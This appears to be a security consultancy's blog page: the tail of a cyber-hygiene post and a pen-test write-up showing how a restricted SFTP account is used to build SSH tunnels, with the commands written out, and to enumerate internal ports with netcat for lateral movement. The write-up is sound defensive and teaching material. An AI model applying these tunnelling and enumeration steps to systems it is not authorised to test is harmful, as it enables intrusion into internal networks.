Robust Authentication – many breaches (particularly for Internet-based services) occur due to weak passwords combined with a lack of additional controls such as multi-factor authentication (MFA) or password lockouts. Review all login interfaces (prioritising Internet-facing) and ensure that as many as possible support these security controls”

Taking such actions will bolster defences and take the weight off the IT/security team, allowing them to monitor and respond appropriately. And they’ll be able to mitigate attacks so that as and when they do occur you can limit incursions. This all makes logical sense but security is still being sidelined in many businesses, particularly in the wake of the pandemic.

The DDCMS 2021 survey reveals that a third of businesses took no remedial action following their most disruptive breach and it’s this inertia that then paves the way for repeat or lateral attacks. The report concludes that organisations need to “recognise that good cyber security facilitates better business resilience” and suggests many businesses have focused too much on business continuity at the expense of security due to the pandemic.

Develop your awareness

Ideally, you want to begin to look critically at your network from the perspective of the attacker and that’s where penetration testing or simulated testing comes in. There are also now frameworks that track the pattern of attacker activity. The MITRE ATT&CK (an acronym that stands for Adversarial Tactics, Techniques and Common Knowledge) framework, identifies the tactics, techniques and procedures (TTP) attackers use and contains over 245 techniques. PRE-ATT&CK looks at attacker activity that happens prior to exploitation of a target network or system, providing some idea of how attackers scope attacks. The framework is continually updated so that new approaches spotted in the wild are added.

Such frameworks can be used to help with penetration testing. This both identifies any security vulnerabilities and weaknesses and whether your controls are implemented and operating correctly and tests are configured to meet the needs of the business, so range in depth.

If you’d like to gain more visibility into your network to counter the ‘knowledge threat’ and to find out more what’s involved in pen testing your systems, email us at contact@prisminfosec.com or call +44 (0) 1242 652 100 for a quick consultation

No Shell? No Problem!

Posted on 16th November 2021 by Prism Infosec

Enumerating internal networks via ssh-tunnels, Alexis V, November 2021

On a recent engagement, we were tasked to assess the security of an Secure File Transfer Protocol (SFTP) server. We were provided with a regular account to facilitate the file uploads, and so proceeded to work our way through the common checks. We tried to:

Log in directly via SSH with the account – this failed as the user most likely had the shell set to /usr/bin/false or similar.
Attempt command execution by appending a command right after SSH login: e.g. ssh user@host /bin/bash. This also failed as the sftp user was set up correctly.
Log in via SFTP, which we did, and checked to see if we were in a chroot jail – as this turned out to be the case we could not access any other directories, files, etc.
Attempt SSH tunnelling with the valid account. This worked, as we were able to bind to an internal service via a command like: ssh -CnfN -L 31337:127.0.0.1:22 user@host

Great, so far so good as we can now access the internal network and start searching for any services that we can exploit to gain a foothold. The problem is that this presents us with 65,535 ports to go through, and that’s just on the SSH host. It doesn’t include all the possible internal hosts. Going through all of these would be an extremely time consuming process if we did so manually.

Despite searching, I was unable to find any tools/scripts that would help me solve this problem, so we decided to write our own.

Flow Diagram of the Enumeration Technique

The concept was fairly simple and could be broken down into the following steps:

Create an SSH tunnel to an internal IP and port
Use netcat to prod the tunnel on the localhost
Look for a ‘connect failed’ string from SSH, indicating a closed port
Or catch a timeout exception, indicating a valid port
Kill the tunnel and move on to the next internal IP and port

After a few hours, we had a working proof of concept that (albeit slow, with a small false positive rate) got the job done. Here’s a sample output of the tool running:

With this information, we can then bind to the known services, access them locally, and start exploiting them to help laterally move through the network.

We’ve uploaded the code to our GitHub. Note that the script was created during an assessment so is in no way optimised, it also sometimes reports false positives (although this can be reduced by setting a correct timeout variable in the script). We always appreciate pull requests!